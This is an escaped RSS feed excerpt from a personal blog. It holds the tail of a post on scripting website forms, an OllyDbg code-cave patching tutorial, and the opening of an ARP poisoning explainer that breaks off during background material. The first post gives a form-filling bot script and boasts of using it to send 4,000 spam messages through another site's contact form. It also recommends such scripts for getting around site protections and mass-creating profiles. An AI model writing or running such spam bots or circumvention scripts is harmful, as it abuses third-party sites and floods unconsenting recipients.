&lt;span style=&quot;color: blue;&quot;&gt;click:dom.a.Email me&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; pagewait&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.your_name.value = xxxx.com&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.your_email.value = xxxx@xxxx.com&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.your_email1.value = xxxx@xxxx.com&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.your_phone.value = xxx.xxx.xxxx&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.input.subject.value = xxxx&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; dom.textarea.1.innerhtml = Hello,  my name is xxxx and I&#39;m inviting you  to come be part of a xxxx website.  We are currently in beta testing and  we need people to help test our our features including: xxxx, xxxx,  xxxx and xxxx, plus a growing community of clients and professionals  like you... Currently, we&#39;re  working on growing our provider base and  would be pleased if you joined us for the open beta test of our system.   Go to www.xxxx.com and sign up for a free account to check us out and  start offering xxxx from anywhere you want.&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span style=&quot;color: blue;&quot;&gt; click:dom.input.8&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
Since both the subject and name were not available, and they also had an  e-mail confirmation line, something that webDOM does not just have as  part of it&#39;s normal PMing tool, I just used code to perform all of the  actions needed.  I clicked &quot;PM All&quot; and viola! worked like a charm.  I  could even watch the progress, and what the bot was actually doing on  the site.  &lt;br /&gt;
&lt;h3&gt;&lt;i&gt;Success!&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;
Only took a matter of about 2 hours to send out all 4,000 messages, and  it turned out that we got about 14 user signups from it.  About a 0.35%  conversion ratio, which is decent enough on a spam campaign... needless  to say, it was free advertising :)&lt;br /&gt;
&lt;br /&gt;
What&#39;s even funnier, my client actually got a call from the other  website&#39;s owner who was infuriated about the whole thing.  Guess he  doesn&#39;t like to be DOMinated... Go figure.&lt;br /&gt;
&lt;h3&gt;&lt;i&gt;What&#39;s More&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;
Either way, you can use super-scripting to manipulate any website you  choose, in a very repetitive, and programmatic way.  I&#39;ve seen some  websites that don&#39;t except POST information from external websites.   Well the way to get around that is simply use their form, but add or  subtract the elements that you need in order to do what you want with  them.&lt;br /&gt;
&lt;br /&gt;
Other things I use the minion coding and webDOM for are building online  profiles, adding friends, sending messages, etc. etc.  These sites are  constantly updating security, but nobody expects such a strong tool to  be used on their site.  For instance, one flimsy defense they use is  Ajax, or using java&amp;lt;b&amp;gt;&amp;lt;/b&amp;gt;script code and hidden submits.   webDOM can see past all of this, and see exactly what you can see on  it&#39;s browser window.  Since your access to the DOM is in real-time and  not set up only once at the loading of a page, you can literally  manipulate anything.  I&#39;ve even seen websites try to do things like  using &quot;div&quot; elements to capture onclick events instead of providing a  link for posting a message... well, fine... I can access the div element  and change it or click on it directly from the super-script, no  problem.&lt;br /&gt;
&lt;br /&gt;
All in all, super-scripting is a powerful new medium that will continue  to surpass the security of websites until they come up with a completely  new standard for building sites, that doesn&#39;t use HTML.&lt;/div&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.newsbubbles.org/webdom/&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.newsbubbles.org/webdom/&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.newsbubbles.org/webdom/&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;left&quot;&gt;&lt;b&gt;Amit Tyagi&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://www.newsbubbles.org/webdom/&quot;&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;</description><link>http://amit-spot.blogspot.com/2010/11/hacking-dom-of-site-using-superscript.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9bLqS7RkVHjFhEjsT5bVpL0xjGedAjThIqq9ilAwKPCY4IIGekufsbp9YG-4vLEE3oOMldM7V7baRrnU55t-tULPBKcUXk1TQC_tqEXLtNNTkzcUucWWF1pge5Ur09jjacy4Td3AT9w/s72-c/dom.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6598945255593319582</guid><pubDate>Thu, 11 Nov 2010 18:37:00 +0000</pubDate><atom:updated>2011-02-24T04:12:08.654-08:00</atom:updated><title>OllyDbg with .chm help - how to add functionality to a closed-source application</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div align=&quot;center&quot; style=&quot;color: lime;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBU_kMjd6VyLBIcEfWagCCZUXBZ-u6S6-Xy3fb80cZsfHRngQBEYCOLUnn6hyriKWhwt2CebL8OTrHzNVd_qxLWei9bM_mbFo84TV5ixHeTDzim8U11tNdKo28CCauElVtIVORcGd6HP4/s1600/ollydbg.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBU_kMjd6VyLBIcEfWagCCZUXBZ-u6S6-Xy3fb80cZsfHRngQBEYCOLUnn6hyriKWhwt2CebL8OTrHzNVd_qxLWei9bM_mbFo84TV5ixHeTDzim8U11tNdKo28CCauElVtIVORcGd6HP4/s1600/ollydbg.jpg&quot; /&gt;&lt;/a&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Intro-&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;OllyDbg - the best ring3 debugger ever :) - has a very handy feature: if  you give Olly the path of the Win32 API documentation, you can get info  on an API function by highlighting it, and pressing CTRL+F1. Well, this  works fine on XP, but it doesn&#39;t work on Vista. Why? As you may already  know, Microsoft made .hlp help files deprecated since Vista. Instead,  the .chm format is recommended. Olly uses the WinHelp API (this function  is used to open .hlp helps) to open the API documentation. When a  program uses WinHelp on Vista (or you just simply try to open a .hlp  file), a window pops up that tells you, that .hlp is dead and buried.  Vista is good, CTRL+F1 is good too, so something had to be done.. Yeah,  well, I could just simply download &lt;a href=&quot;http://www.microsoft.com/downloads/details.aspx?familyid=6EBCFAD9-D3F5-4365-8070-334CD175D4BB&amp;amp;displaylang=en&quot;&gt;WinHlp32.exe  for Vista&lt;/a&gt;, but hey, what&#39;s the fun in that? :)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;&lt;i&gt;.hlp to .chm&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;First, I did the boring part of the job: I converted the Win32 API .hlp  file to .chm format. This can be done with two free tools: &lt;a href=&quot;http://www.geocities.com/mwinterhoff/helpdeco.htm&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;HelpDeco&lt;/span&gt;&lt;/a&gt;  and &lt;a href=&quot;http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&amp;amp;displaylang=en&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;HTML  Help Workshop&lt;/span&gt;&lt;/a&gt;. Uncompress the .hlp file...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;helpdeco.exe win32.hlp /y&lt;/span&gt;&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;... and generate a content file:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;helpdeco.exe win32.hlp /y /c&lt;/span&gt;&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;When this is done, start a new project in HTML Help Workshop, and check  the Convert WinHelp project checkbox. From now on, just follow the  wizard, and your reward will be a brand new, shiny .chm file!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;&lt;i&gt;Let&#39;s code!&lt;/i&gt;&lt;/h3&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;There is an API function similar to WinHelp which deals with .chm help  files: HtmlHelp. So, my plan was simple:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;1. write a function, that wraps HtmlHelp, so it can be called with the  same parameters as WinHelp&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;2. find a code cave (a bunch of 0x00 bytes) in Olly, and insert the  wrapper there&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;3. replace all WinHelp calls with a call to my wrapper.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Indeed, I could write the wrapper function inside Olly into the code  cave, but I choose a more comfortable way. I fired up WinASM, and wrote  the function and a little framework to test it. Here is the source code  of the function:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;MyWinHelp proc hWndMain:HWND, lpszHelp:LPCTSTR, uCommand:UINT,  dwData:DWORD&lt;br /&gt;
LOCAL aklink:HH_AKLINK&lt;br /&gt;
.if uCommand == HELP_PARTIALKEY&lt;br /&gt;
mov aklink.cbStruct, sizeof(HH_AKLINK)&lt;br /&gt;
mov aklink.fReserved, FALSE&lt;br /&gt;
mov eax, dwData&lt;br /&gt;
mov aklink.pszKeywords, eax&lt;br /&gt;
mov aklink.pszUrl, NULL&lt;br /&gt;
mov aklink.pszMsgText, NULL&lt;br /&gt;
mov aklink.pszMsgTitle, NULL&lt;br /&gt;
mov aklink.pszWindow, NULL&lt;br /&gt;
mov aklink.fIndexOnFail, TRUE&lt;br /&gt;
invoke HtmlHelp, hWndMain, lpszHelp, HH_KEYWORD_LOOKUP, addr aklink&lt;br /&gt;
.elseif uCommand == HELP_CONTEXT&lt;br /&gt;
invoke HtmlHelp, hWndMain, lpszHelp, HH_HELP_CONTEXT, dwData&lt;br /&gt;
.elseif uCommand == HELP_INDEX&lt;br /&gt;
invoke HtmlHelp, hWndMain, lpszHelp, HH_DISPLAY_INDEX, 0&lt;br /&gt;
.endif&lt;br /&gt;
ret&lt;br /&gt;
MyWinHelp endp&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
The WinHelp function&#39;s uCommand parameter can have a lot of values; I  implemented only the ones, that occur in Olly (HELP_PARTIALKEY,  HELP_CONTEXT and HELP_INDEX).&lt;br /&gt;
&lt;br /&gt;
OK, I got the wrapper, I had to insert it into Olly. I opened the above  mentioned framework in Olly, highlighted the wrapper, and copied the  opcodes to the clipboard with the Asm2Clipboard plugin. Then, I opened  Olly in - guess what - another instance of Olly, did a little digging to  find a code cave, and binary pasted the content of the clipboard. NOTE:  I have cheated a bit with the code below. It doesn&#39;t look like this  right after inserting it; a few adjustments have to be made. I&#39;ll  explain these changes later.&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: blue;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; 004AF6EE   /$  55                     PUSH EBP&lt;br /&gt;
004AF6EF   |.  8BEC                   MOV EBP,ESP&lt;br /&gt;
004AF6F1   |.  83C4 E0                ADD ESP,-20&lt;br /&gt;
004AF6F4   |.  817D 10 05010000       CMP [ARG.3],105&lt;br /&gt;
004AF6FB   |.  75 4B                  JNZ SHORT Lbr68_-_.004AF748&lt;br /&gt;
004AF6FD   |.  C745 E0 20000000       MOV [LOCAL.8],20&lt;br /&gt;
004AF704   |.  C745 E4 00000000       MOV [LOCAL.7],0&lt;br /&gt;
004AF70B   |.  8B45 14                MOV EAX,[ARG.4]&lt;br /&gt;
004AF70E   |.  8945 E8                MOV [LOCAL.6],EAX&lt;br /&gt;
004AF711   |.  C745 EC 00000000       MOV [LOCAL.5],0&lt;br /&gt;
004AF718   |.  C745 F0 00000000       MOV [LOCAL.4],0&lt;br /&gt;
004AF71F   |.  C745 F4 00000000       MOV [LOCAL.3],0&lt;br /&gt;
004AF726   |.  C745 F8 00000000       MOV [LOCAL.2],0&lt;br /&gt;
004AF72D   |.  C745 FC 01000000       MOV [LOCAL.1],1&lt;br /&gt;
004AF734   |.  8D45 E0                LEA EAX,[LOCAL.8]&lt;br /&gt;
004AF737   |.  50                     PUSH EAX&lt;br /&gt;
004AF738   |.  6A 0D                  PUSH 0D&lt;br /&gt;
004AF73A   |.  FF75 0C                PUSH [ARG.2]&lt;br /&gt;
004AF73D   |.  FF75 08                PUSH [ARG.1]&lt;br /&gt;
004AF740   |.  FF15 95F64A00          CALL DWORD PTR DS:[4AF695]&lt;br /&gt;
004AF746   |.  EB 2F                  JMP SHORT Lbr68_-_.004AF777&lt;br /&gt;
004AF748   |&amp;gt;  837D 10 01             CMP [ARG.3],1&lt;br /&gt;
004AF74C   |.  75 13                  JNZ SHORT Lbr68_-_.004AF761&lt;br /&gt;
004AF74E   |.  FF75 14                PUSH [ARG.4]&lt;br /&gt;
004AF751   |.  6A 0F                  PUSH 0F&lt;br /&gt;
004AF753   |.  FF75 0C                PUSH [ARG.2]&lt;br /&gt;
004AF756   |.  FF75 08                PUSH [ARG.1]&lt;br /&gt;
004AF759   |.  FF15 95F74A00          CALL DWORD PTR DS:[4AF795]&lt;br /&gt;
004AF75F   |.  EB 16                  JMP SHORT Lbr68_-_.004AF777&lt;br /&gt;
004AF761   |&amp;gt;  837D 10 03             CMP [ARG.3],3&lt;br /&gt;
004AF765   |.  75 10                  JNZ SHORT Lbr68_-_.004AF777&lt;br /&gt;
004AF767   |.  6A 00                  PUSH 0&lt;br /&gt;
004AF769   |.  6A 02                  PUSH 2&lt;br /&gt;
004AF76B   |.  FF75 0C                PUSH [ARG.2]&lt;br /&gt;
004AF76E   |.  FF75 08                PUSH [ARG.1]&lt;br /&gt;
004AF771   |.  FF15 95F64A00          CALL DWORD PTR DS:[4AF695]&lt;br /&gt;
004AF777   |&amp;gt;  C9                     LEAVE&lt;br /&gt;
004AF778   \.  C2 1000                RETN 10&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
The wrapper uses HtmlHelp which is exported by HHCtrl.ocx. This file is  not loaded by Olly, so I had to load it, and get the address of the  HtmlHelp API function. This piece of code is quite simple, so I didn&#39;t  use WinASM this time.&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: blue;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; 004AF6BC    .  A1 1B014B00            MOV EAX,DWORD PTR DS:[4B011B]&lt;br /&gt;
004AF6C1    .  90                     NOP&lt;br /&gt;
004AF6C2    .  60                     PUSHAD&lt;br /&gt;
004AF6C3    .  68 80F64A00            PUSH Lbr68_-_.004AF680    ;  /FileName = &quot;HHCtrl.ocx&quot;&lt;br /&gt;
004AF6C8    .  E8 6BFAFFFF            CALL  &amp;lt;JMP.&amp;amp;KERNEL32.LoadLibraryA&amp;gt;  ; \LoadLibraryA&lt;br /&gt;
004AF6CD    .  68 8BF64A00            PUSH Lbr68_-_.004AF68B    ;  /ProcNameOrOrdinal = &quot;HtmlHelpA&quot;&lt;br /&gt;
004AF6D2    .  50                     PUSH EAX        ; |hModule =  764C36C4&lt;br /&gt;
004AF6D3    .  E8 B8F9FFFF            CALL  &amp;lt;JMP.&amp;amp;KERNEL32.GetProcAddress&amp;gt; ; \GetProcAddress&lt;br /&gt;
004AF6D8    .  A3 95F64A00            MOV DWORD PTR DS:[4AF695],EAX   ;   kernel32.BaseThreadInitThunk&lt;br /&gt;
004AF6DD    .  61                     POPAD&lt;br /&gt;
004AF6DE    .^ E9 3419F5FF            JMP Lbr68_-_.00401017&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
A little explanation: instructions through 0x004AF6C3 to 0x004AF6D3 load  HHCtrl.ocx and get the address of the HtmlHelp function. Two APIs are  used to achieve this task: LoadLibrary and GetProcAddress. If I assemble  the call of these functions in Olly as CALL LoadLibrary and CALL  GetProcAddress, Olly will use their actual address. This can be a  problem, because the actual address of API&#39;s can vary (e.g.: ASLR,  different version of OS). The problem can be eliminated by calling the  APIs through the jump thunk table. So, I had to find the functions in  the jump thunk table, and CALL those addresses (e.g. instead of CALL  LoadLibrary, I had to assemble CALL 4AF138):&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;004AF138    $- FF25 B4D35000          JMP DWORD PTR  DS:[&amp;lt;&amp;amp;KERNEL32.LoadLibraryA&amp;gt;] ;  kernel32.LoadLibraryA&lt;/span&gt;&lt;br style=&quot;color: blue;&quot; /&gt; &lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
There are some instructions, I haven&#39;t explained yet, so let&#39;s move on!  The instruction at 0x004AF6BC was originally located near the entry  point of Olly. I&#39;ve replaced it with the JMP, which jumps to this piece  of code, so I had to insert it here. Here is the JMP at near EP (at  0x00401012):&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;0040100D       E9                     DB E9&lt;br /&gt;
0040100E    .  28014B00               DD Lbr68_-_.004B0128&lt;br /&gt;
00401012    &amp;gt;  E9 A5E60A00            JMP Lbr68_-_.004AF6BC&lt;br /&gt;
00401017    &amp;gt;  C1E0 02                SHL EAX,2&lt;/span&gt; &lt;/tt&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
The PUSHAD stores the values of the general purpose registers before my  code runs, and the POPAD restores these values after my code. This is  important, because a messed up register value could crash the program.  The MOV at 0x004AF6D8 stores the address of HtmlHelp at address  0x004AF695 (this address is also located in the code cave). And now is  the time to tell you more about the above mentioned adjustments to the  wrapper code. All CALL HtmlHelp instructions had to be changed to CALL  DWORD PTR[4AF695], because the address of HtmlHelp is stored at  0x004AF695. The last instruction, the JMP at 0x004AF6DE jumps back to  near the entry point, from where we have jumped here earlier.&lt;br /&gt;
&lt;br /&gt;
One more thing: we need the strings &quot;HHCtrl.ocx&quot; and &quot;HtmlHelpA&quot; to be  able to load the library, and get the address of the function. Of course  this is not a big deal, there are plenty of space in the code cave, so  we can put them there:&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt; 004AF680    .  48 48 43 74 72 6C 2E 6&amp;gt;ASCII &quot;HHCtrl.ocx&quot;,0&lt;br /&gt;
004AF68B    .  48 74 6D 6C 48 65 6C 7&amp;gt;ASCII &quot;HtmlHelpA&quot;,0&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
If we save the modifications to the .exe, and try to run it, it will  crash. Uh-oh, now what? Never fear, I is here (yeah, well.. who can tell  me, which movie is this quote from? :) ). The code cave is in the .text  section, which is a non-writable section, yet we try to write the  address of HtmlHelp to 0x004AF695, which is indeed in the .text section.  We can easily make .text section writable, there are a lot of tools  capable of doing the job. Or it can be done manually, with a hex editor,  but we are not masochists. At least, I am not, so I have used PEditor.  Here is how to do it with that tool: open the .exe with PEditor, click  on the sections button, right click on the .text section, choose edit  section, than char. wizard. Now check the writeable checkbox, click on  take it!, and you&#39;re ready.&lt;br /&gt;
&lt;br /&gt;
Now the program runs normally. All we have to do is replace all WinHelp  calls with a call to the wrapper. We could search for all WinHelps, and  replace them with a CALL 4AF6EE (I have the wrapper at that address),  but we are lazy, so we take another path. That path leads us to the jump  thunk table. We search for WinHelp in the table, and replace the jump  with a JMP 4AF6EE. Here I have done the change (at 0x004AF5FA):&lt;br /&gt;
&lt;br /&gt;
CODE : &lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;004AF5F4    $- FF25 90D95000          JMP DWORD PTR  DS:[&amp;lt;&amp;amp;USER32.UpdateWindow&amp;gt;]                          ;   USER32.UpdateWindow&lt;br /&gt;
004AF5FA       E9 EF000000            JMP Lbr68_-_.004AF6EE&lt;br /&gt;
004AF5FF       90                     NOP&lt;br /&gt;
004AF600    $- FF25 98D95000          JMP DWORD PTR  DS:[&amp;lt;&amp;amp;USER32.WindowFromPoint&amp;gt;]                       ;   USER32.WindowFromPoint&lt;/span&gt; &lt;/tt&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #e06666;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
We can now save the modifications to the .exe, and we can enjoy our  .chm-capable OllyDbg :)&lt;br /&gt;
Thank you for reading this stuff.&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Amit Tyagi&lt;/span&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/ollydbg-with-chm-help-how-to-add.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBU_kMjd6VyLBIcEfWagCCZUXBZ-u6S6-Xy3fb80cZsfHRngQBEYCOLUnn6hyriKWhwt2CebL8OTrHzNVd_qxLWei9bM_mbFo84TV5ixHeTDzim8U11tNdKo28CCauElVtIVORcGd6HP4/s72-c/ollydbg.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-2396180049393124435</guid><pubDate>Thu, 11 Nov 2010 18:31:00 +0000</pubDate><atom:updated>2011-02-24T04:17:05.464-08:00</atom:updated><title>ARP Poisoning-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;color: lime;&quot;&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9aGj9fz__Oi6t5da2_XhHGbmMss7q1_gO8jYKAISJjQD03mPiViqsL-HJKVEKLVRyPSCs55Pg1d3tuNHX-Oz7ybjWvFJwbz6K-nloMCJYKuAzj26VgRE4ZkehKZ5VdLYYCxPQ1_LbunY/s1600/arp2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9aGj9fz__Oi6t5da2_XhHGbmMss7q1_gO8jYKAISJjQD03mPiViqsL-HJKVEKLVRyPSCs55Pg1d3tuNHX-Oz7ybjWvFJwbz6K-nloMCJYKuAzj26VgRE4ZkehKZ5VdLYYCxPQ1_LbunY/s1600/arp2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;/i&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-large;&quot;&gt;Table of contents&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;- Difference  between a switch and a hub&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;- What is  ARP?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;- What is ARP  Poisoning?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Difference between a switch and a hub&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;If you have a network running with a hub, there is no need for ARP  Poisoning to sniff the network. Because if you send information over a  hubbed network, all computers will receive the data. The hub gets the  information, and sends it out on all ports. But, on a switched network  only the destination computer gets the data. That means that your  sniffer won&#39;t pick up anything, unless it is for you. The switch uses an  addressing system called Media Access Control (MAC). Every computer has  a MAC address. The switch holds and maintains a table that associates  MAC addresses with certain ports, so that the info will only be sent to  the given MAC address. A computer can not communicate with another  computer before it has it&#39;s MAC address, simple as that. This is where  the Address Resolution Protocol (ARP) comes in.&lt;/span&gt;&lt;br /&gt;
